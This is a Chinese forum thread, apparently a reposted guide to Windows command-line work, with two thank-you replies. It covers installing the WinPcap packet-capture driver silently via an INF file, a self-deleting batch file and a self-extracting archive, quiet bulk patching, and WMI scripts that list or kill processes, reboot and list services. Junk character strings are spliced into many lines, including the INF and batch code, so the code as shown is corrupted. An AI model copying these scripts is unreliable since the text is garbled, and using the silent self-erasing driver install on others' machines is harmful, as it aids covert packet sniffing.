7 Y# h+ b+ m9 D# I# K8 T8 H" _netdiag /debug /test:ipsec

然后是一长串输出信息。IPSec策略位于最后。

韩冰

安装
6 r: n( e( E+ I! w6 O9 u一个软件/工具的安装过程，一般来说只是做两件事：拷贝文件到特定目录和修改注册表。只要搞清楚具体的内容，那么就可以自己在命令行下实现了。（不考虑安装后需要注册激活等情况）

WinPcap是个很常用的工具，但必须在窗口界面下安装。在网上也可以找到不用GUI的版本（但还是有版权页），其实我们完全可以自己做一个。

以WinPcap 3.0a 为例。通过比较安装前后的文件系统和注册表快照，很容易了解整个安装过程。
除去反安装的部分，关键的文件有三个：wpcap.dll，packet.dll和npf.sys。前面两个文件位于system32目录下，第三个在system32\drivers下。而注册表的变化是增加了一个系统服务NPF。注意，是系统服务（即驱动）不是Win32服务。

作为系统服务，不但要在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services下增加主键，在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root下也增加主键。而后者默认只有SYSTEM身份才可以修改。幸运的是，并不需要手动添加它，winpcap被调用时会自动搞定。甚至完全不用手动修改注册表，所有的事winpcap都会自己完成，只需要将三个文件复制到合适的位置就行了。
  j& Q% x8 e, O$ n
  N/ g5 h3 q) b$ H8 l$ Z作为范例，还是演示一下如何修改注册表：利用前面说过的inf文件来实现。

[Version]
Signature="$WINDOWS NT$"
- \9 C4 {8 z' V+ P, P( U6 `$ o% b[DefaultInstall.Services]
, F8 z! @, t6 XAddService=NPF,,winpcap_svr
, a/ u  h1 q. ?+ U7 g3 G5 H[winpcap_svr]
DisplayName=Netgroup Packet Filter
* r; L3 X" ^9 Y. q" h. ^ServiceType=0x1
StartType=3
ErrorControl=1
0 e' y9 a5 `" I& n3 Y& k% tServiceBinary=%12%\npf.sys
( D% i7 |3 l6 \/ X4 w/ K4 I
将上面这些内容保存为_wpcap_.inf文件。
' z/ f# Z# I# j5 q再写一个批处理_wpcap_.bat：

: Y6 m! e0 ^6 j7 krundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%\_wpcap_.inf
* i7 h2 z, n1 a4 V7 y: j( cdel _wpcap_.inf
8 n3 [5 @2 N. b  R  F5 Rif /i %CD%==%SYSTEMROOT%\system32 goto COPYDRV
: h. Y$ E0 Z7 H& gcopy packet.dll %SYSTEMROOT%\system32\
copy wpcap.dll %SYSTEMROOT%\system32\
4 u- O' D( _6 ?5 }) g3 Ydel packet.dll
9 C2 i  @7 }2 P1 ^" y* t/ ]del wpcap.dll
+ s- c- g8 o( \0 H:COPYDRV
if /i %CD%==%SYSTEMROOT%\system32\drivers goto END
copy npf.sys %SYSTEMROOT%\system32\drivers\
$ d; F. _1 ?! z2 m( [* D, J7 Qdel npf.sys
:END
8 d  [* R; q4 Y! r. r0 idel %0

然后用winrar将所有文件（5个）打包为自解压的exe，并将『高级自解压选项』->『解压后运行』设置为_wpcap_.bat，命令行的winpcap安装包就制作完成了。
& O' r4 `( w  r: Z6 d
注意，批处理最后一行没有回车符。否则会因为正在运行而无法删除自己。

所有的软件安装，基本上可以套用这个思路。但也有例外的，那就是系统补丁的安装。
由于系统补丁有可能要替换正在被执行或访问的文件，所以用copy命令是不行的。
幸好，Windows补丁包支持命令行安装。
比如：
0 U) n. {0 m) k& x
KB824146.exe -n -z -q
( Q0 `4 t- `/ y4 U' H8 V4 z+ {6 U
1 E: g: T, B7 x-n 不保留备份
6 @. ~1 Q5 D. a1 D4 q, x-z 不重起
-q 安静模式

; C3 k& J* _  d2 z* D$ r0 ]如果有一堆补丁要打，那么用RAR打包成自解压文件，外加一个批处理。
( u, t) j$ S4 c
( ~2 s  h9 U" P7 {, i3 p. Tfor %%f in (KB??????.exe) do %%f -n -z -q
for %%f in (KB??????.exe) do del %%f
del %0
4 |4 a% D( K2 p) X/ u
' k; {4 u- t& _0 c0 r% J
& Q; b. S! ~8 r0 HWindows脚本
7 ^) m* K9 D6 {$ B- C7 |/ w6 ~很多事用脚本来做是很简洁的。下面给出几个常用脚本的echo版。

' l5 s$ ?; X+ N" r1，显示系统版本
- C, M- `2 D( s: p- B! M
0 @2 A; i% w/ P6 r@echo for each ps in getobject _ >ps.vbs
! i6 N) p0 j. d4 ~3 [! T" n5 w@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>ps.vbs
@echo wscript.echo ps.caption^&" "^&ps.version:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs
5 b) ~; X+ I! ~9 ]9 K. L1 ?) U9 [: X
2，列举进程
9 B  R; m. l4 d3 q: W! c
@echo for each ps in getobject _ >ps.vbs
7 b' s% A- ]) g% r@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
- _- w3 @: b$ [: M! U: v@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs
+ I2 N- g8 }9 ~5 w; q
3，终止进程

8 ^1 q  h6 v, w0 @: w@echo for each ps in getobject _ >pk.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pk.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pk.vbs
7 K0 w/ S, L$ E3 A- n: B
6 V% O. K0 z! |/ J! t要终止PID为123的进程，使用如下语法：
cscript pk.vbs 123
& Y* W' J! b9 p% }
# ]+ `, s1 D, {如果显示一个0，表示终止成功。
6 n, D2 a: p# N
然后：
del pk.vbs
" V3 y. ]. z) ~  I& X' b4 H
$ h& E. s2 P/ {$ p, F- Z% X) z" X4，重启系统
( \- A3 r1 [' O. w$ I
7 B4 m# w& O1 Y4 X4 \9 m# o( s@echo for each os in getobject _ >rb.vbs
$ R- d) i& u+ Y  D@echo ("winmgmts:{(shutdown)}!\\.\root\cimv2:win32_operatingsystem").instances_ >>rb.vbs
@echo os.win32shutdown(2):next >>rb.vbs & cscript //nologo rb.vbs & del rb.vbs

5，列举自启动的服务

@echo for each sc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >sc.vbs
4 \" H" D& i& u# p+ Q@echo if sc.startmode="Auto" then wscript.echo sc.name^&" - "^&sc.pathname >>sc.vbs
6 x( l+ r$ Z# l- `8 M3 k- s4 n* I8 z2 n@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs
! h3 l" A8 |; J$ P4 @- f7 l
) p5 Y3 z) f1 g" p5 V7 Y$ G6，列举正在运行的服务

/ W. Q# }0 D9 Z1 F, X5 }@echo for each sc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >sc.vbs
( \2 c2 E( f' b" N@echo if sc.state="Running" then wscript.echo sc.name^&" - "^&sc.pathname >>sc.vbs
& l  ^. c: R; P@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs

7，显示系统最后一次启动的时间

3 @/ s; N3 c' t- X3 m% }@echo for each os in getobject _ >bt.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>bt.vbs
; K% E8 P3 j% s@echo wscript.echo os.lastbootuptime:next >>bt.vbs & cscript //nologo bt.vbs & del bt.vbs
6 M* L' s- ^" S/ F4 W' y* c+ M
显示结果的格式是：
yyyymmddHHMMSSxxxxxxZZZZ
_年_月日时分秒_微秒_时区
, |, r+ f" b+ W0 Y) c+ b
8，显示系统运行时间
2 q5 t. {% f: E: W7 m
@echo for each os in getobject _ >rt.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_perfrawdata_perfos_system").instances_ >>rt.vbs
@echo s=os.timestamp_sys100ns:l=len(s):s=left(s,l-7):for i=1 to l-7 >>rt.vbs
@echo t=t^&mid(s,i,1):d=t\86400:r=r^&d:t=t mod 86400:next >>rt.vbs
" y- z/ t/ e% e2 G; C* S6 q. {@echo wscript.echo cint(r)^&"d "^&t\3600^&"h "^&t\60 mod 60^&"m "^&t mod 60^&"s":next >>rt.vbs
2 }& @# m8 h- F" F1 Lcscript //nologo rt.vbs & del rt.vbs
& }7 `! W+ P$ m7 y; Q6 n
- z) V4 V& U3 p+ e0 A这个运行时间是从性能计数器中获得的64位整型数，不会出现在49.7天后溢出的情况。

juneshumo

太好了…………感激不尽…………

iTonyDou

有学了不少东西，呵呵，谢谢楼主了！！！！！！！！！！